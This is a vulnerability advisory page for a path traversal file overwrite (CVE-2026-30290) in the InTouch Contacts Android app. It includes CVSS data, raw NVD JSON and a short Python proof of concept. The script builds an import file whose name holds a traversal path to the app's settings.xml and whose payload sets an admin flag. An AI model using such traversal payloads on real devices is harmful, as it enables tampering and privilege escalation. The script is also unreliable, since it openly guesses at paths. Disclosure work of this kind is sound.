Security Vulnerability Report
CVE-2026-30290 CVSS 8.4 HIGH


Published: 2026-03-31 20:16:27
Last Modified: 2026-04-07 16:11:05

Description

An arbitrary file overwrite vulnerability in InTouch Contacts & Caller ID APP v6.38.1 allows attackers to overwrite critical internal files via the file import process, leading to arbitrary code execution or information exposure.

CVSS Details

CVSS Score
8.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:intouchapp:intouch_contacts_\&_caller_id:6.38.1:*:*:*:*:android:*:* - VULNERABLE
InTouch Contacts & Caller ID APP v6.38.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import os

# PoC for CVE-2026-30290: Arbitrary File Overwrite via File Import
# Description: This script generates a malicious file intended to overwrite
# a critical internal file via path traversal when imported by the vulnerable app.


def generate_poc():
    # Define the target internal file path using path traversal sequences
    # Note: The actual path depends on the app's data directory structure.
    traversal_sequence = "../../../data/data/com.intouch.app/shared_prefs/settings.xml"

    # Malicious content to be written (e.g., enabling admin privileges)
    payload = "<boolean name='is_admin' value='true'/>"

    # Create a file with the traversal sequence in the name or content,
    # depending on the specific implementation details of the import function.
    poc_filename = f"contacts_backup_{traversal_sequence}.xml"
    with open(poc_filename, 'w') as f:
        f.write(payload)

    print(f"[+] PoC file generated: {poc_filename}")
    print(f"[+] Attempting to overwrite: {traversal_sequence}")
    print("[+] Upload this file to the device and import it via InTouch App.")


if __name__ == "__main__":
    generate_poc()

References

https://github.com/Secsys-FDU/AF_CVEs/issues/19 - Exploit, Third Party Advisory
https://secsys.fudan.edu.cn/ - Not Applicable
https://www.intouchapp.com/ - Product

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-30290", "sourceIdentifier": "[email protected]", "published": "2026-03-31T20:16:26.670", "lastModified": "2026-04-07T16:11:04.630", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An arbitrary file overwrite vulnerability in InTouch Contacts & Caller ID APP v6.38.1 allows attackers to overwrite critical internal files via the file import process, leading to arbitrary code execution or information exposure."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:intouchapp:intouch_contacts_\\&_caller_id:6.38.1:*:*:*:*:android:*:*", "matchCriteriaId": "CC5EECA3-F5B4-4A89-947D-3C61F3BAE4B3"}]}]}], "references": [{"url": "https://github.com/Secsys-FDU/AF_CVEs/issues/19", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://secsys.fudan.edu.cn/", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.intouchapp.com/", "source": "[email protected]", "tags": ["Product"]}]}}